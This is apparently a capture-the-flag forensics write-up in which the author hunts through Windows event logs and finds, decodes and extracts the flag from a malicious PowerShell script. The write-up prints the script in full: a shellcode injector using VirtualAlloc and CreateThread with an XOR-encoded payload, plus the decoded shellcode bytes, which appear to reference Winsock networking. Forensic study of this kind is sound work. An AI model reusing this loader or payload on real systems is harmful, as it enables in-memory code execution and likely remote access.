Planet Longhir is known for its top-tier researchers. Due to their dedication to science and engineering, their military equipment is the most advanced in the galaxy. In fact, the prototype DES-3000, a self-propelled precision-strike missile that is capable of reaching targets even in the Ratnik galaxy, is being used to disable the Galactic Federation's communication satellites. The mystery that Miyuki is trying to solve is how the satellite's location was leaked, since it is a top secret that only the Galactic Federation's council is aware of. Help her analyse the Council's HQ event logs and solve this mystery.
This challenge consisted of a ton of EVTX files to hunt through for clues on how the info was leaked.
Ended up using a utility called evtxexport to read these files, dump the output quickly, and parse it for clues.
apt install libevtx-utils -y
Ran evtxexport --help to get a list of the commands:
evtxexport 20181227
Missing source file.
Use evtxexport to export items stored in a Windows XML Event Viewer
Log (EVTX) file.
Usage: evtxexport [ -c codepage ] [ -f format ] [ -l log_file ]
[ -m mode ] [ -p resource_files_path ]
[ -r registy_files_path ] [ -s system_file ]
[ -S software_file ] [ -t event_log_type ]
[ -hTvV ] source
source: the source file
-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-949, windows-950,
windows-1250, windows-1251, windows-1252 (default),
windows-1253, windows-1254, windows-1255, windows-1256
windows-1257 or windows-1258
-f: output format, options: xml, text (default)
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, items (default), recovered
'all' exports the (allocated) items and recovered items,
'items' exports the (allocated) items and 'recovered' exports
the recovered items
-p: search PATH for the resource files
-r: name of the directory containing the SOFTWARE and SYSTEM
(Windows) Registry file
-s: filename of the SYSTEM (Windows) Registry file.
This option overrides the path provided by -r
-S: filename of the SOFTWARE (Windows) Registry file.
This option overrides the path provided by -r
-t: event log type, options: application, security, system
if not specified the event log type is determined based
on the filename.
-T: use event template definitions to parse the event record data
-v: verbose output to stderr
-V: print version
Ended up quickly dumping all event logs to disk as txt files that can be parsed with grep:
for ln in *.evtx ; do echo "-------- $ln ---------------------------" ; evtxexport "$ln" > "$ln.txt" ; done
Did a bit of grepping for a few things with cat *.txt | grep $searchterm -A30 -B45 to output lots of lines before and after, basically around my search terms. Needed to look more closely though, as I was seeing a lot.
Started going through them manually with less until I found some interesting stuff in the PowerShell logs.
@15:40:31 : powershell process injector found:
Looks like some malicious stuff here, in Microsoft-Windows-PowerShell%4Operational.evtx.txt (event string 3):
$OleSPrlmhB = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;

$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;

[array]::Reverse($stage2);

$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);

$stage3 = $stage1 + $stage2;

[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);

# Unpack Shellcode;

for($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)
{
 $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;
}

#Unpack Special Orders!

for($i=0;$i -lt $stage3.count;$i++){
 $stage3[$i] = $stage3[$i] -bxor 0xd1;
}

$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);
Had to figure out how to decode it. Not too hard honestly. Finally got it: commented out the baddies and output some things. Had to play with the format a little, but I use PowerShell a lot so this wasn't bad for me.
[..]
#[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);
# Unpack Shellcode
for($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)
{
$HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;
}
#Unpack Special Orders!
for($i=0;$i -lt $stage3.count;$i++){
$stage3[$i] = $stage3[$i] -bxor 0xd1;
}
write-output "`r`n`r`n"
write-output "stage3:"
foreach ($c in $stage3) {
$chr=[char][int]$c
write-host -NoNewLine $chr
}
write-output "`r`n`r`n"
write-output "HVOASfFuNSxRXR:"
foreach ($c in $HVOASfFuNSxRXR) {
$chr=[char][int]$c
write-host -NoNewLine $chr
}
#$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);
Cool! Ran it and:
stage3:
HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}
HVOASfFuNSxRXR:
AÁâíRHR AQB<HÐfxR`HRQVHR H·JJM1ÉHrPH1À¬<a|, AÁÉ
rH
¬AÁ8àuñLLE9ÑuØXD@$IÐfAHÖH1ÀAÁÉ
HD@IÐAAXAX^YHÐZAXAYAZHì ARÿàXAYZHéKÿÿÿ]I¾ws2_32AVI æHì I åI¼9À¨ATI äL ñAºLw&ÿÕL êhYAº)kÿÕj
A^PPM1ÉM1ÀHÿÀH ÂHÿÀH ÁAºêßàÿÕH ÇjAXL âH ùAº¥taÿÕ
Àt
IÿÎuåèHìH âM1ÉjAXH ùAºÙÈ_ÿÕø~UHÄ ^ öj@AYhAXH òH1ÉAºX¤SåÿÕH ÃI ÇM1ÉI ðH ÚH ùAºÙÈ_ÿÕø}(XAWYh@AXjZAº
/0ÿÕWYAºunMaÿÕIÿÎé<ÿÿÿHÃH)ÆH
öu´AÿçXjYIÇÂðµ¢VÿÕ
This one was not bad, maybe an hour or so? Fun and rewarding to find.